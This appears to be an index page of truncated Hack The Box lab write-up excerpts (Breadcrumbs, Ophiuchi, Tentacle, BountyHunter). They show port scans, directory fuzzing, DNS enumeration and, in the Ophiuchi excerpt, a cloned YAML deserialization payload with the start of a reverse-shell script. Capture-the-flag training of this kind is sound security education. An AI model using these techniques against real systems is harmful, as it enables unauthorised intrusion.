Hack_The_Box_Writeups

Hack The Box – Breadcrumbs

http://10.10.10.228/ β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads/ffuf] └─# ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.228/FUZZ https://10.10.10.228/php/books.php https://10.10.10.228/php/ https://10.10.10.228/db/ https://10.10.10.228/books/ https://10.10.10.228/portal/login.php Here click on helper https://10.10.10.228/portal/php/admins.php https://10.10.10.228/portal/login.php...
Hack_The_Box_Writeups

Hack The Box – Ophiuchi

http://10.10.10.227:8080/ β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads] └─# echo “10.10.10.227 ophiuchi.htb” >> /etc/hosts β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads] └─# git clone https://github.com/artsploit/yaml-payload β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads/yaml-payload] └─# cat rev.sh           #!/bin/sh bash -i...
Hack_The_Box_Writeups

Hack The Box – Tentacle

β”Œβ”€β”€(rootπŸ’€kali)-[/home/kali/Downloads] └─# nmap -sV -v -p- –min-rate=10000 10.10.10.224 http://10.10.10.224:3128/ By above we get j.nakazawa@realcorp.htbsrv01.realcorp.htb (squid/4.11) β”Œβ”€β”€(rootπŸ’€kali)-[/home/…/Downloads/SecLists/Discovery/DNS] └─# dnsenum –threads 64...
Hack_The_Box_Writeups

HackTheBox – BountyHunter

β”Œβ”€β”€(rootkali)-[/home/kali/Downloads] └─# nmap -A 10.10.11.100 β”Œβ”€β”€(rootkali)-[/home/kali/Downloads] └─# dirb http://10.10.11.100/ http://10.10.11.100/resources/ http://10.10.11.100/resources/README.txt β”Œβ”€β”€(rootkali)-[/home/kali/Downloads] └─# dirb http://10.10.11.100/ -X .php http://10.10.11.100/portal.php Since it...